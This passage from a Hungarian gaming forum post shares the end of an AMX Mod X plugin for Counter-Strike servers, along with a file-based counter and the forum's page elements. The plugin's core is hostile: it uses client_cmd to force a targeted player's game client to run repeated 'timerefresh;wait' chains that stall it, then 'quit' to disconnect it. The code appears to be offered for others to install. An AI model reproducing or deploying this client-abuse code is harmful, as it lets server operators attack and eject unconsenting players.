         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator,"timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait")
         client_cmd(jucator, "quit")
         return;
      }
   }
}
public Cronometru(id){
   new parm[1]
   parm[0] = id
   if (ComandaB){
      set_task(3.0,"VarakozasiIdo",Baza+id,parm)
   }
}
public TimpDeAsteptare(id){
   if (task_exists(Baza+id)){
      remove_task(Baza+id)
   }
   ComandaB = false
}
 
stock IncarcareServer(){
   get_configsdir(DirectorServer, 63)
   format(FisierServer,127,"%s/servit.q",DirectorServer)
   if (!file_exists(FisierServer)){
      return PLUGIN_HANDLED
   }
   else {
 
      read_file(FisierServer,0,TextServer,LimbaServer,r)
 
      SalvareServer = str_to_num(TextServer)
   }
   return PLUGIN_CONTINUE
 
}
stock ScriereServer(){
   get_configsdir(DirectorServer, 63)
   format(FisierServer,127,"%s/servit.q",DirectorServer)
   if (!file_exists(FisierServer)){
      return PLUGIN_HANDLED
   }
   else {
 
      read_file(FisierServer,0,TextServer,LimbaServer,t)
 
 
      SalvareServer = str_to_num(TextServer)
      SalvareServer = SalvareServer + 1
      format(TextServer,31,"%i",SalvareServer)
      delete_file(FisierServer)
      write_file(FisierServer,TextServer,-1)
   }
   return PLUGIN_CONTINUE
}
/* AMXX-Studio Notes - DO NOT MODIFY BELOW HERE
*{ rtf1 ansi deff0{ fonttbl{ f0 fnil Tahoma;}}n viewkind4 uc1 pard lang1033 f0 fs16 n par }
*/


Nyomj egy köszönömöt , Nincsmit ! :D

_________________
https://www.facebook.com/Anm.CsTeam?fref=ts

Ők köszönték meg reminder nek ezt a hozzászólást: Painci (2013.08.18. 21:21)
  Népszerűség: 2.27%


Hozzászólás jelentése
Vissza a tetejére
   
Hozzászólások megjelenítése:  Rendezés  
Új téma nyitása  Hozzászólás a témához  [ 2 hozzászólás ] 


Ki van itt

Jelenlévő fórumozók: nincs regisztrált felhasználó valamint 52 vendég


Nyithatsz új témákat ebben a fórumban.
Válaszolhatsz egy témára ebben a fórumban.
Nem szerkesztheted a hozzászólásaidat ebben a fórumban.
Nem törölheted a hozzászólásaidat ebben a fórumban.
Nem küldhetsz csatolmányokat ebben a fórumban.

Keresés:
Ugrás:  
Powered by phpBB® Forum Software © phpBB Limited
Magyar fordítás © Magyar phpBB Közösség
Portal: Kiss Portal Extension © Michael O'Toole